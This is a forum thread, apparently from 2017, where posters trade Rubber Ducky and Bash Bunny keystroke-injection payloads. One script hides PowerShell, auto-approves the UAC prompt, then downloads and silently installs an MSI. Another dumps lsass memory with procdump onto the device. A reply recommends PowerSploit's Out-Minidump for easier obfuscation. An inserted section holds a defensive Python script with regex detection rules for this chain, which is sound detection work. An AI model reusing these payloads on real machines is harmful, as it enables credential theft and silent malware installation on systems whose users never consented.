Soultouche Posted May 12, 2017

Hi,

There is something I don't understand with the Bash Bunny... I don't know, I feel like it's too hard for my brain to understand how it works compared to the Rubber Ducky, so I need some help.

I have this on a Rubber Ducky. It's pretty basic and does what I want: starting an admin PowerShell, asking for admin and THEN running my command (download a file, output that file and run it quietly).

DELAY 1500
GUI r
DELAY 1000
STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn""
ENTER
DELAY 1000
ALT o
ALT y

So what would be the best way to do that without requiring the download, because the file will be on the Bash Bunny, either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program won't install correctly. I can't get it to open an admin PowerShell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program (time saver).

Thanks a lot
Soultouche Posted May 13, 2017

RUN WIN powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''$DRIVE''').Name+'payloads\\$SWITCH_POSITION\s.msi') /qn"

This is exactly what I have to do, but it's not working because it's not running as admin.
Soultouche Posted May 22, 2017

Anyone?
rottingsun Posted May 22, 2017 (edited)

Here's my working code for running an executable (procdump) from the bunny within PowerShell and saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special PowerShell operator that evaluates the text following the & character as a command and not a PowerShell object.

LED Y 100
source bunny_helpers.sh
LED B 100
ATTACKMODE HID STORAGE
Q GUI r
Q DELAY 500
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q DELAY 500
Q ENTER
Q DELAY 500
Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
Q ENTER
Q DELAY 200
Q STRING \$driveEject\=New-Object -comObject Shell.Application
Q ENTER
Q DELAY 200
Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 200
Q STRING exit
Q ENTER
LED FINISH

Edited May 22, 2017 by rottingsun
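For defenders reading this thread, here is an added example, not code from any poster, of how the chain in rottingsun's payload (a UAC elevation, a WMI volume lookup by label, the call operator applied to the looked-up drive, procdump against lsass, then a COM eject of the drive) shows up in PowerShell script-block logging and can be scored as a set rather than as one-off hits. The log entries are constructed, the rule names and weights are my own choices, and Python is used only so the rules can be exercised offline; the same regexes can be dropped into a SIEM rule.

```python
import re

# Constructed sample of PowerShell script-block log text (what Event ID 4104 records
# when script block logging is on), one entry per block. Made up for this example.
SAMPLE_BLOCKS = [
    "gwmi win32_volume | Select-Object Name, Label, Capacity",            # benign admin query
    "Start-Process powershell -Verb runAs",                                 # UAC elevation
    "$bunny=(gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)",
    "& $bunny\\payloads\\switch1\\Procdump\\procdump.exe -accepteula -ma lsass.exe $bunny\\loot\\lsd.dmp",
    "$driveEject=New-Object -comObject Shell.Application",
    "$driveEject.Namespace(17).ParseName($bunny).InvokeVerb(\"Eject\")",
    "Start-Process msiexec -ArgumentList '/i \\\\fileserver\\apps\\agent.msi /qn' -Verb runAs",  # benign
]

# (rule name, weight, pattern). Case-insensitive because PowerShell is.
RULES = [
    ("elevation_via_start_process", 1, re.compile(r"start-process\s+powershell\b.*-verb\s+runas", re.I)),
    ("volume_lookup_by_label",      1, re.compile(r"win32_volume\b.*\blabel\s*=", re.I)),
    # call operator (& or .) applied to a variable-rooted path or a computed expression
    ("invoke_from_looked_up_drive", 2, re.compile(r"^\s*[&.]\s*(\$\w+\\|\()", re.I)),
    ("lsass_memory_dump",           5, re.compile(r"procdump.*-ma\s+lsass\b|out-minidump", re.I)),
    ("removable_drive_eject",       1, re.compile(r"invokeverb\(\s*[\"']eject[\"']\s*\)", re.I)),
]
WEIGHT = {name: w for name, w, _ in RULES}

def match_rules(block):
    """Names of every rule that fires on a single script block, in RULES order."""
    return [name for name, _, rx in RULES if rx.search(block)]

def triage(blocks, alert_at=3):
    """Score a session (script blocks from one PowerShell host process) by the
    summed weight of the distinct rules that fired. A lone volume query or UAC
    prompt is routine; the full chain from this thread scores 10, and an lsass
    dump (weight 5) crosses the threshold on its own."""
    fired = {}
    for block in blocks:
        for name in match_rules(block):
            fired[name] = WEIGHT[name]
    score = sum(fired.values())
    return score, sorted(fired), score >= alert_at

if __name__ == "__main__":
    for label, blocks in (("benign", SAMPLE_BLOCKS[:1] + SAMPLE_BLOCKS[6:]),
                          ("thread chain", SAMPLE_BLOCKS[1:6])):
        print(label, triage(blocks))
```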
Dave-ee Jones Posted May 23, 2017

My payload, Slydoor, was made to do this. You should check it out :) (It's in my signature).
PoSHMagiC0de Posted May 23, 2017

Trying to follow if there are any escaped double quotes. Those double quotes will not translate through quack. You will have to escape them to show up in the quack command. Remember, while they are being run from the bunny payload.txt, they are running in bash still.

@rottingsun Check out this script in place of using the procdump.exe so you have more flexibility to obfuscate, if it comes down to it, than what you have with a binary.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

As long as you are at or above the access level of the process you are dumping, you can get it. Run in a high-integrity PowerShell shell and it will work on any process.